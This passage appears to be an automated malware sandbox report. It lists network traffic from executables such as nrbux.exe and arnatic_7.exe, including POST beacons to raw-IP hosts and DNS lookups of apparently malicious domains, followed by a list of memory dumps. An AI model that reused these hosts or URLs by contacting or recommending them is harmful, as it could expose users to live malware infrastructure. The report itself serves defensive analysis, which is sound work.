                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        750 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
  http | nrbux.exe | sent 606 B / recv 445 B | pkts 8 / 7
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200
• 87.251.71.195:82
  http://87.251.71.195:82/ | http | arnatic_7.exe | sent 552 B / recv 172 B | pkts 4 / 4
  HTTP Request: POST http://87.251.71.195:82/
• 87.251.71.195:82
  http://87.251.71.195:82/ | http | arnatic_7.exe | sent 644 B / recv 252 B | pkts 6 / 6
  HTTP Request: POST http://87.251.71.195:82/
• 87.251.71.195:82
  http://87.251.71.195:82/ | http | arnatic_7.exe | sent 920 B / recv 492 B | pkts 12 / 12
  HTTP Request: POST http://87.251.71.195:82/
• 185.215.113.55:80
  http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | sent 606 B / recv 445 B | pkts 8 / 7
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200
• 185.215.113.55:80
  http://185.215.113.55/t5BnOoke2/index.php?scr=1 | http | nrbux.exe | sent 727 B / recv 405 B | pkts 6 / 6
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
• 87.251.71.195:82
  http://87.251.71.195:82/ | http | arnatic_7.exe | sent 736 B / recv 292 B | pkts 8 / 7
  HTTP Request: POST http://87.251.71.195:82/
• 185.215.113.55:80
  http://185.215.113.55/t5BnOoke2/index.php | http | nrbux.exe | sent 560 B / recv 405 B | pkts 7 / 6
  HTTP Request: POST http://185.215.113.55/t5BnOoke2/index.php
  HTTP Response: 200
• 127.0.0.1:58833 | setup_install.exe
• 127.0.0.1:58835 | setup_install.exe
• 10.10.0.24:80 | rundll32.exe
• 10.10.0.24:80 | rundll32.exe
• 8.8.8.8:53
  motiwa.xyz | dns | setup_install.exe | sent 56 B / recv 88 B | pkts 1 / 1
  DNS Request: motiwa.xyz
  DNS Response: 104.21.12.59, 172.67.193.180
• 8.8.8.8:53
  ip-api.com | dns | jooyu.exe | sent 56 B / recv 72 B | pkts 1 / 1
  DNS Request: ip-api.com
  DNS Response: 208.95.112.1
• 8.8.8.8:53
  videoconvert-download38.xyz | dns | arnatic_5.exe | sent 73 B / recv 105 B | pkts 1 / 1
  DNS Request: videoconvert-download38.xyz
  DNS Response: 172.67.201.250, 104.21.42.63
• 8.8.8.8:53
  email.yg9.me | dns | SystemNetworkService | sent 58 B / recv 74 B | pkts 1 / 1
  DNS Request: email.yg9.me
  DNS Response: 198.13.62.186
• 8.8.8.8:53
  email.yg9.me | dns | SystemNetworkService | sent 58 B / recv 129 B | pkts 1 / 1
  DNS Request: email.yg9.me
• 198.13.62.186:53
  email.yg9.me | SystemNetworkService | sent 62.5kB / recv 664.9kB | pkts 1192 / 1192
• 8.8.8.8:53
  www.facebook.com | dns | jooyu.exe | sent 62 B / recv 107 B | pkts 1 / 1
  DNS Request: www.facebook.com
  DNS Response: 157.240.240.35
• 8.8.8.8:53
  iphonemoney.xyz | dns | 7398983.exe | sent 61 B / recv 93 B | pkts 1 / 1
  DNS Request: iphonemoney.xyz
  DNS Response:

                                                                                                                                                                                        172.67.182.129
                                                                                                                                                                                        104.21.51.159

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        sergeevih43.tumblr.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        BN2v6gd1v89066wDB6eRa3Rp.exe
                                                                                                                                                                                        68 B
                                                                                                                                                                                        100 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        sergeevih43.tumblr.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        74.114.154.22
                                                                                                                                                                                        74.114.154.18

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        uyg5wye.2ihsfa.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        80 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        uyg5wye.2ihsfa.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.218.92.148

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        iw.gamegame.info
                                                                                                                                                                                        dns
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        62 B
                                                                                                                                                                                        94 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iw.gamegame.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.21.221
                                                                                                                                                                                        172.67.200.215

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        download-serv-235442.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        4460127.exe
                                                                                                                                                                                        70 B
                                                                                                                                                                                        102 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        download-serv-235442.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.54.72
                                                                                                                                                                                        172.67.136.97

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        iplogger.org
                                                                                                                                                                                        dns
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        74 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iplogger.org

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.99.66.31

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        pcfixmy-download-13.xyz
                                                                                                                                                                                        dns
                                                                                                                                                                                        3466090.exe
                                                                                                                                                                                        69 B
                                                                                                                                                                                        101 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        pcfixmy-download-13.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.46.30
                                                                                                                                                                                        172.67.222.237

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        ipinfo.io
                                                                                                                                                                                        dns
                                                                                                                                                                                        1um0tg3NcHdOWZT14jfQXEXD.exe
                                                                                                                                                                                        55 B
                                                                                                                                                                                        71 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ipinfo.io

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        34.117.59.81

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        ppcspb.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        224 B
                                                                                                                                                                                        224 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ppcspb.com

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        name-usa.info
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        59 B
                                                                                                                                                                                        75 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        name-usa.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        176.99.131.168

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        www.quickfastfuriousloaded.com
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        76 B
                                                                                                                                                                                        92 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.quickfastfuriousloaded.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        89.221.213.3

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        jom.diregame.live
                                                                                                                                                                                        dns
                                                                                                                                                                                        arnatic_6.exe
                                                                                                                                                                                        63 B
                                                                                                                                                                                        95 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        jom.diregame.live

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.21.65.45
                                                                                                                                                                                        172.67.158.82

                                                                                                                                                                                      • 8.8.8.8:53
fikerty.info  dns  arnatic_6.exe  58 B  90 B  1  1
  DNS Request: fikerty.info
  DNS Response: 172.67.202.130, 104.21.76.249

• 8.8.8.8:53  cdn.discordapp.com  dns  arnatic_6.exe  64 B  144 B  1  1
  DNS Request: cdn.discordapp.com
  DNS Response: 162.159.135.233, 162.159.129.233, 162.159.133.233, 162.159.134.233, 162.159.130.233

• 8.8.8.8:53  flamkravmaga.com  dns  arnatic_6.exe  248 B  248 B  4  4
  DNS Request: flamkravmaga.com
  DNS Request: flamkravmaga.com
  DNS Request: flamkravmaga.com
  DNS Request: flamkravmaga.com

• 8.8.8.8:53  mebbing.com  dns  228 B  228 B  4  4
  DNS Request: mebbing.com
  DNS Request: mebbing.com
  DNS Request: mebbing.com
  DNS Request: mebbing.com

• 8.8.8.8:53  fackerty.info  dns  arnatic_6.exe  59 B  91 B  1  1
  DNS Request: fackerty.info
  DNS Response: 172.67.155.53, 104.21.89.3

• 8.8.8.8:53  flamkravmaga.com  dns  arnatic_6.exe  248 B  248 B  4  4
  DNS Request: flamkravmaga.com
  DNS Request: flamkravmaga.com
  DNS Request: flamkravmaga.com
  DNS Request: flamkravmaga.com

• 8.8.8.8:53  twcamel.com  dns  228 B  228 B  4  4
  DNS Request: twcamel.com
  DNS Request: twcamel.com
  DNS Request: twcamel.com
  DNS Request: twcamel.com

• 8.8.8.8:53  howdycash.com  dns  236 B  236 B  4  4
  DNS Request: howdycash.com
  DNS Request: howdycash.com
  DNS Request: howdycash.com
  DNS Request: howdycash.com

• 8.8.8.8:53  lahuertasonora.com  dns  64 B  224 B  1  1
  DNS Request: lahuertasonora.com
  DNS Response: 220.125.1.129, 210.180.252.88, 90.191.200.51, 109.102.255.230, 187.156.139.53, 58.228.68.101, 186.6.236.46, 211.108.106.8, 109.98.58.98, 88.158.247.38

• 8.8.8.8:53  iplogger.com  dns  f63HbxfV2WYcYU58wgLyTehf.exe  58 B  74 B  1  1
  DNS Request: iplogger.com
  DNS Response: 88.99.66.31

• 8.8.8.8:53  clients2.google.com  dns  chrome.exe  65 B  105 B  1  1
  DNS Request: clients2.google.com
  DNS Response: 172.217.20.78

• 8.8.8.8:53  accounts.google.com  dns  chrome.exe  65 B  81 B  1  1
  DNS Request: accounts.google.com
  DNS Response: 216.58.208.109

• 8.8.8.8:53  ezsearch.ru  dns  chrome.exe  57 B  89 B  1  1
  DNS Request: ezsearch.ru
  DNS Response: 172.67.195.177, 104.21.92.163

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        56 B
                                                                                                                                                                                        88 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        dns.google

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        8.8.4.4
                                                                                                                                                                                        8.8.8.8

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        159 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        r3.o.lencr.org

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        95.100.96.171
                                                                                                                                                                                        95.100.96.192

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        66 B
                                                                                                                                                                                        82 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        a.nel.cloudflare.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        35.190.80.1

                                                                                                                                                                                      • 172.67.195.177:443
                                                                                                                                                                                        ezsearch.ru
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        76 B
                                                                                                                                                                                        121 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        clients2.googleusercontent.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        142.250.179.161

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        61 B
                                                                                                                                                                                        77 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ssl.gstatic.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        142.251.36.3

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        76 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        g-partners.top

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        159.65.63.164

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        90 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        hcaptcha.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.16.168.131
                                                                                                                                                                                        104.16.169.131

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        56 B
                                                                                                                                                                                        72 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        usa01.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        176.99.131.168

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        60 B
                                                                                                                                                                                        76 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        rdanoriran.xyz

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        185.183.98.8

                                                                                                                                                                                      • 224.0.0.251:5353
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        204 B
                                                                                                                                                                                        3
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        55 B
                                                                                                                                                                                        145 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        api.ip.sb

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        104.26.13.31
                                                                                                                                                                                        104.26.12.31
                                                                                                                                                                                        172.67.75.172

                                                                                                                                                                                      • 142.251.36.1:443
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        69 B
                                                                                                                                                                                        167 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.msftconnecttest.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        13.107.4.52

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        80 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        edgedl.me.gvt1.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        34.104.35.123

                                                                                                                                                                                      • 142.250.179.142:443
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        68 B
                                                                                                                                                                                        150 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iecvlist.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        152.199.19.161

                                                                                                                                                                                      • 216.58.208.99:443
                                                                                                                                                                                        https
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        6.9kB
                                                                                                                                                                                        5
                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        68 B
                                                                                                                                                                                        112 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ieonline.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        204.79.197.200

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        157 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        go.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        23.66.21.99

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        63 B
                                                                                                                                                                                        230 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        95.100.186.52

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        206 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.bing.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        204.79.197.200
                                                                                                                                                                                        13.107.21.200

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        76 B
                                                                                                                                                                                        185 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        self.events.data.microsoft.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        52.114.128.74

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        124 B
                                                                                                                                                                                        188 B
                                                                                                                                                                                        2
                                                                                                                                                                                        2

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ol.gamegame.info

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        ol.gamegame.info

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.200.215
                                                                                                                                                                                        104.21.21.221

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        172.67.200.215
                                                                                                                                                                                        104.21.21.221

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        31.13.83.36

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        157.240.201.35

• 8.8.8.8:53  dns.google  dns  chrome.exe  128 B  448 B  2  2
  DNS Request: lahuertasonora.com
  DNS Request: lahuertasonora.com
  DNS Response:


  DNS Response:


• 8.8.8.8:53  dns.google  dns  chrome.exe  62 B  107 B  1  1
  DNS Request: www.facebook.com
  DNS Response: 31.13.64.35

• 8.8.8.8:53  dns.google  dns  chrome.exe  62 B  107 B  1  1
  DNS Request: www.facebook.com
  DNS Response: 31.13.83.36

• 8.8.8.8:53  dns.google  dns  chrome.exe  58 B  74 B  1  1
  DNS Request: iplogger.org
  DNS Response: 88.99.66.31

• 8.8.8.8:53  dns.google  dns  chrome.exe  64 B  224 B  1  1
  DNS Request: lahuertasonora.com
  DNS Response:


MITRE ATT&CK Enterprise v6


Downloads

• memory/68-198-0x0000015A8A740000-0x0000015A8A7B1000-memory.dmp (Filesize: 452KB)
• memory/68-191-0x0000015A89CA0000-0x0000015A89CEC000-memory.dmp (Filesize: 304KB)
• memory/184-232-0x0000000005120000-0x0000000005121000-memory.dmp (Filesize: 4KB)
• memory/184-217-0x0000000004EB0000-0x0000000004EB1000-memory.dmp (Filesize: 4KB)
• memory/184-210-0x0000000004E10000-0x0000000004E11000-memory.dmp (Filesize: 4KB)
• memory/184-207-0x0000000004F50000-0x0000000004F51000-memory.dmp (Filesize: 4KB)
• memory/184-190-0x0000000000400000-0x000000000041E000-memory.dmp (Filesize: 120KB)
• memory/184-206-0x0000000005570000-0x0000000005571000-memory.dmp (Filesize: 4KB)
• memory/184-212-0x0000000004E70000-0x0000000004E71000-memory.dmp (Filesize: 4KB)
• memory/848-168-0x0000000000CA0000-0x0000000000CA1000-memory.dmp (Filesize: 4KB)
• memory/932-227-0x0000017366760000-0x00000173667D1000-memory.dmp (Filesize: 452KB)
• memory/988-284-0x0000000000900000-0x00000000009AE000-memory.dmp (Filesize: 696KB)
• memory/988-285-0x0000000000400000-0x00000000008F4000-memory.dmp (Filesize: 5.0MB)
• memory/1084-221-0x0000025C2FB40000-0x0000025C2FBB1000-memory.dmp (Filesize: 452KB)
• memory/1196-255-0x000001A02C240000-0x000001A02C2B1000-memory.dmp (Filesize: 452KB)
• memory/1256-323-0x0000000005710000-0x0000000005711000-memory.dmp (Filesize: 4KB)
• memory/1288-257-0x00000202F2340000-0x00000202F23B1000-memory.dmp (Filesize: 452KB)
• memory/1356-241-0x0000023DC6E00000-0x0000023DC6E71000-memory.dmp (Filesize: 452KB)
• memory/1892-251-0x00000243BD940000-0x00000243BD9B1000-memory.dmp (Filesize: 452KB)
• memory/2084-295-0x000001C20D190000-0x000001C20D296000-memory.dmp (Filesize: 1.0MB)
• memory/2084-294-0x000001C20C2F0000-0x000001C20C30B000-memory.dmp (Filesize: 108KB)
• memory/2084-226-0x000001C20A980000-0x000001C20A9F1000-memory.dmp (Filesize: 452KB)
• memory/2156-165-0x00000000008C0000-0x00000000008C1000-memory.dmp (Filesize: 4KB)
• memory/2156-170-0x0000000000FF0000-0x0000000000FF1000-memory.dmp (Filesize: 4KB)
• memory/2156-176-0x000000001B4D0000-0x000000001B4D2000-memory.dmp (Filesize: 8KB)
• memory/2156-172-0x0000000001020000-0x0000000001021000-memory.dmp (Filesize: 4KB)
• memory/2156-171-0x0000000001000000-0x000000000101F000-memory.dmp (Filesize: 124KB)

                                                                                                                                                                                      • memory/2272-204-0x00000152B4A70000-0x00000152B4AE1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2332-213-0x0000018A666C0000-0x0000018A66731000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2360-242-0x000002A307730000-0x000002A3077A1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2384-252-0x0000018BDBF60000-0x0000018BDBFD1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2468-132-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152KB

                                                                                                                                                                                      • memory/2468-135-0x0000000000400000-0x000000000051E000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.1MB

                                                                                                                                                                                      • memory/2468-133-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-136-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-134-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-137-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-131-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.5MB

                                                                                                                                                                                      • memory/2468-130-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        572KB

                                                                                                                                                                                      • memory/2620-287-0x0000000002590000-0x000000000262D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        628KB

                                                                                                                                                                                      • memory/2620-288-0x0000000000400000-0x0000000000949000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5.3MB

                                                                                                                                                                                      • memory/2752-222-0x0000022D02070000-0x0000022D020E1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/3120-296-0x00000000010A0000-0x00000000010B6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        88KB

                                                                                                                                                                                      • memory/3644-335-0x0000000005430000-0x0000000005A36000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.0MB

                                                                                                                                                                                      • memory/4000-214-0x000001C0F6F70000-0x000001C0F6FE1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/4088-188-0x0000000002FF8000-0x00000000030F9000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.0MB

                                                                                                                                                                                      • memory/4088-194-0x0000000004940000-0x000000000499D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        372KB

                                                                                                                                                                                      • memory/4168-346-0x0000000005310000-0x0000000005311000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

